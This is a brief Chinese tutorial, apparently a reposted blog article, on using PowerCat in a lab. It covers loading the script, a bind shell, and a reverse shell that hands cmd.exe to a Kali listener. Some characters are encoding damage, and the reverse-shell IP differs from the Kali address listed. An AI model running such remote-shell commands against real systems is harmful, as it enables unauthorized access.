powercat的使用方法
發(fā)布時(shí)間:2021-09-14 11:25
來(lái)源:億速云
閱讀:0
作者:chen
欄目: 網(wǎng)絡(luò )安全
這篇文章主要講解了“powercat的使用方法”��,文中的講解內容簡(jiǎn)單清晰�,易于學(xué)習與理解���,下面請大家跟著(zhù)小編的思路慢慢深入�,一起來(lái)研究和學(xué)習“powercat的使用方法”吧�����!
PowerCat是powershell版本的nc�,PowerCat可以無(wú)縫的和Netcat連接�����。更加隱匿��。
1.實(shí)驗環(huán)境:
操作系統 IP
windows server2016: 10.10.3.6
windows 7 192.168.123.8 10.10.3.100
kali2020 192.168.123.234
條件:
win7與server2016之間網(wǎng)絡(luò )可達
win7與kali之間網(wǎng)絡(luò )可達
kali與win2016網(wǎng)絡(luò )不可達
(記得ping不通可能是防火墻策略)
運行-cmd�,然后輸入powershell
輸入命令‘Import-Module .\powercat.ps1’
如果出現以下情況��,是因為權限問(wèn)題
(powercat.ps1是PowerShell寫(xiě)的腳本文本���,你可以在記事本中寫(xiě)一段PowerShell代碼�,然后將其保存為“xxx.ps1”���,后面要使用它的時(shí)候��,雙擊即可運行了��,但windows默認不支持腳本文件�����,需要進(jìn)行處理��。)
輸入命令“Set-ExecutionPolicy remotesigned” ���,然后輸入“y”提升權限
(會(huì )存在需要管理員權限進(jìn)行操作����,以管理員運行cmd即可)
再次輸入命令‘Import-Module .\powercat.ps1’
輸入 “powercat -h”
2.通過(guò)netcat正向鏈接powercat
win7:powercat -l -p 8888 -e cmd.exe -v
kali:netcat 192.168.123.8 8888 -vv 正向鏈接成功
3.反向鏈接:
kali:netcat -l -p 8888 -vv
win7:powercat -c 192.168.123.134 -p 8888 -v
通過(guò)win7向kali傳輸數據���。
(中文亂碼:待解決)
kali:netcat -l -p 8888 -vv
win7:powercat -c 192.168.123.134 -p 8888 -v -e cmd.exe
